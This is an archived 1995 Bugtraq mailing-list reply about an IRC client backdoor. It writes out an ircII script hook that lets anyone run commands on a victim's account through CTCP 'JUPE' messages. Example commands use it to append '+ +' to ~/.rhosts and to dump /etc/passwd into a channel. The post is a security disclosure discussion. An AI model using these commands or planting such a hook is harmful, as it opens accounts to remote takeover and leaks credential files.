|
Bugtraq
mailing list archives
Re: IRC Security Loophole
From: lwells () netcom com (Kernel Panic)
Date: Fri, 3 Feb 1995 18:30:53 -0800 (PST)
On Fri, 3 Feb 1995, Silicon Avatar wrote:
On Fri, 3 Feb 1995, Lorna Leong wrote:
Hi,
I read somewhere that there is a security loophole in IRC. I don't know
anything else about it but I would like to find out more information
about this. I heard that information about this IRC loophole can be found
by FTP at ftp.cert.org, but I couldn't find anything relevant there.
If you are talking about the "jupe" or "grok" hole. It was temporary, and
merely hacked version of the client floating around at "trusted" sites.
To my knowledge, these "hacks" have been removed and are no longer a threat
(unless someone is propogating these older clients.)
Simply put, you could "CTCP grok [command]" (CTCP being a method of
communication over IRC) someone, and have that command executed,
unknowingly, off the account.
No, IRC holes are a more serious threat than you give then credit for.
For example, if I were to add to a script (or better yet make someone
type) the following:
/on ^ctcp "% % JUPE" $3-
They would be just as much in my control as if they were on a hacked client.
from this, you can do:
/ctcp <nick> JUPE /exec echo + + >> $HOME/.rhosts
or
/ctcp <nick> JUPE /red #<channel> /exec cat /etc/passwd
Theres more to IRC backdoors than making people say stupid stuff on a
channel. I hope this example clears that up a little.
/dev/kmem
-
This sig deleted for brevity
-
 By Date 
By Thread
Current thread:
|
Intro
